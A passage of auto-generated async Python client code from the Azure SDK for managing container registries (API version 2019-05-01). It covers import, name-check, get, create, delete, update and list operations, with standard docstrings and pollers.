:type parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def begin_import_image(
self,
resource_group_name: str,
registry_name: str,
parameters: Union[_models.ImportImageParameters, IO],
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Copies an image to this container registry from the specified container registry.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param parameters: The parameters specifying the image to copy and the source container
registry. Is either a model type or a IO type. Required.
:type parameters: ~azure.mgmt.containerregistry.v2019_05_01.models.ImportImageParameters or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._import_image_initial( # type: ignore
resource_group_name=resource_group_name,
registry_name=registry_name,
parameters=parameters,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_import_image.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}/importImage"
}
@overload
async def check_name_availability(
self,
registry_name_check_request: _models.RegistryNameCheckRequest,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.RegistryNameStatus:
"""Checks whether the container registry name is available for use. The name must contain only
alphanumeric characters, be globally unique, and between 5 and 50 characters in length.
:param registry_name_check_request: The object containing information for the availability
request. Required.
:type registry_name_check_request:
~azure.mgmt.containerregistry.v2019_05_01.models.RegistryNameCheckRequest
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RegistryNameStatus or the result of cls(response)
:rtype: ~azure.mgmt.containerregistry.v2019_05_01.models.RegistryNameStatus
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def check_name_availability(
self, registry_name_check_request: IO, *, content_type: str = "application/json", **kwargs: Any
) -> _models.RegistryNameStatus:
"""Checks whether the container registry name is available for use. The name must contain only
alphanumeric characters, be globally unique, and between 5 and 50 characters in length.
:param registry_name_check_request: The object containing information for the availability
request. Required.
:type registry_name_check_request: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RegistryNameStatus or the result of cls(response)
:rtype: ~azure.mgmt.containerregistry.v2019_05_01.models.RegistryNameStatus
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def check_name_availability(
self, registry_name_check_request: Union[_models.RegistryNameCheckRequest, IO], **kwargs: Any
) -> _models.RegistryNameStatus:
"""Checks whether the container registry name is available for use. The name must contain only
alphanumeric characters, be globally unique, and between 5 and 50 characters in length.
:param registry_name_check_request: The object containing information for the availability
request. Is either a model type or a IO type. Required.
:type registry_name_check_request:
~azure.mgmt.containerregistry.v2019_05_01.models.RegistryNameCheckRequest or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RegistryNameStatus or the result of cls(response)
:rtype: ~azure.mgmt.containerregistry.v2019_05_01.models.RegistryNameStatus
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.RegistryNameStatus] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(registry_name_check_request, (IO, bytes)):
_content = registry_name_check_request
else:
_json = self._serialize.body(registry_name_check_request, "RegistryNameCheckRequest")
request = build_check_name_availability_request(
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self.check_name_availability.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("RegistryNameStatus", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
check_name_availability.metadata = {
"url": "/subscriptions/{subscriptionId}/providers/Microsoft.ContainerRegistry/checkNameAvailability"
}
@distributed_trace_async
async def get(self, resource_group_name: str, registry_name: str, **kwargs: Any) -> _models.Registry:
"""Gets the properties of the specified container registry.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Registry or the result of cls(response)
:rtype: ~azure.mgmt.containerregistry.v2019_05_01.models.Registry
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
cls: ClsType[_models.Registry] = kwargs.pop("cls", None)
request = build_get_request(
resource_group_name=resource_group_name,
registry_name=registry_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("Registry", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}"
}
async def _create_initial(
self, resource_group_name: str, registry_name: str, registry: Union[_models.Registry, IO], **kwargs: Any
) -> _models.Registry:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.Registry] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(registry, (IO, bytes)):
_content = registry
else:
_json = self._serialize.body(registry, "Registry")
request = build_create_request(
resource_group_name=resource_group_name,
registry_name=registry_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._create_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize("Registry", pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize("Registry", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {}) # type: ignore
return deserialized # type: ignore
_create_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}"
}
@overload
async def begin_create(
self,
resource_group_name: str,
registry_name: str,
registry: _models.Registry,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.Registry]:
"""Creates a container registry with the specified parameters.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param registry: The parameters for creating a container registry. Required.
:type registry: ~azure.mgmt.containerregistry.v2019_05_01.models.Registry
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Registry or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerregistry.v2019_05_01.models.Registry]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def begin_create(
self,
resource_group_name: str,
registry_name: str,
registry: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.Registry]:
"""Creates a container registry with the specified parameters.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param registry: The parameters for creating a container registry. Required.
:type registry: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Registry or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerregistry.v2019_05_01.models.Registry]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def begin_create(
self, resource_group_name: str, registry_name: str, registry: Union[_models.Registry, IO], **kwargs: Any
) -> AsyncLROPoller[_models.Registry]:
"""Creates a container registry with the specified parameters.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param registry: The parameters for creating a container registry. Is either a model type or a
IO type. Required.
:type registry: ~azure.mgmt.containerregistry.v2019_05_01.models.Registry or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Registry or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerregistry.v2019_05_01.models.Registry]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.Registry] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._create_initial(
resource_group_name=resource_group_name,
registry_name=registry_name,
registry=registry,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("Registry", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_create.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}"
}
async def _delete_initial( # pylint: disable=inconsistent-return-statements
self, resource_group_name: str, registry_name: str, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
cls: ClsType[None] = kwargs.pop("cls", None)
request = build_delete_request(
resource_group_name=resource_group_name,
registry_name=registry_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._delete_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}"
}
@distributed_trace_async
async def begin_delete(self, resource_group_name: str, registry_name: str, **kwargs: Any) -> AsyncLROPoller[None]:
"""Deletes a container registry.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._delete_initial( # type: ignore
resource_group_name=resource_group_name,
registry_name=registry_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_delete.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}"
}
async def _update_initial(
self,
resource_group_name: str,
registry_name: str,
registry_update_parameters: Union[_models.RegistryUpdateParameters, IO],
**kwargs: Any
) -> _models.Registry:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.Registry] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(registry_update_parameters, (IO, bytes)):
_content = registry_update_parameters
else:
_json = self._serialize.body(registry_update_parameters, "RegistryUpdateParameters")
request = build_update_request(
resource_group_name=resource_group_name,
registry_name=registry_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize("Registry", pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize("Registry", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {}) # type: ignore
return deserialized # type: ignore
_update_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}"
}
@overload
async def begin_update(
self,
resource_group_name: str,
registry_name: str,
registry_update_parameters: _models.RegistryUpdateParameters,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.Registry]:
"""Updates a container registry with the specified parameters.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param registry_update_parameters: The parameters for updating a container registry. Required.
:type registry_update_parameters:
~azure.mgmt.containerregistry.v2019_05_01.models.RegistryUpdateParameters
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Registry or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerregistry.v2019_05_01.models.Registry]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def begin_update(
self,
resource_group_name: str,
registry_name: str,
registry_update_parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.Registry]:
"""Updates a container registry with the specified parameters.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param registry_update_parameters: The parameters for updating a container registry. Required.
:type registry_update_parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Registry or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerregistry.v2019_05_01.models.Registry]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def begin_update(
self,
resource_group_name: str,
registry_name: str,
registry_update_parameters: Union[_models.RegistryUpdateParameters, IO],
**kwargs: Any
) -> AsyncLROPoller[_models.Registry]:
"""Updates a container registry with the specified parameters.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param registry_update_parameters: The parameters for updating a container registry. Is either
a model type or a IO type. Required.
:type registry_update_parameters:
~azure.mgmt.containerregistry.v2019_05_01.models.RegistryUpdateParameters or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Registry or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerregistry.v2019_05_01.models.Registry]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.Registry] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._update_initial(
resource_group_name=resource_group_name,
registry_name=registry_name,
registry_update_parameters=registry_update_parameters,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("Registry", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_update.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}"
}
@distributed_trace
def list_by_resource_group(self, resource_group_name: str, **kwargs: Any) -> AsyncIterable["_models.Registry"]:
"""Lists all the container registries under the specified resource group.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either Registry or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.containerregistry.v2019_05_01.models.Registry]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
cls: ClsType[_models.RegistryListResult] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_resource_group_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_by_resource_group.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("RegistryListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
list_by_resource_group.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries"
}
@distributed_trace
def list(self, **kwargs: Any) -> AsyncIterable["_models.Registry"]:
"""Lists all the container registries under the specified subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either Registry or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.containerregistry.v2019_05_01.models.Registry]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
cls: ClsType[_models.RegistryListResult] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
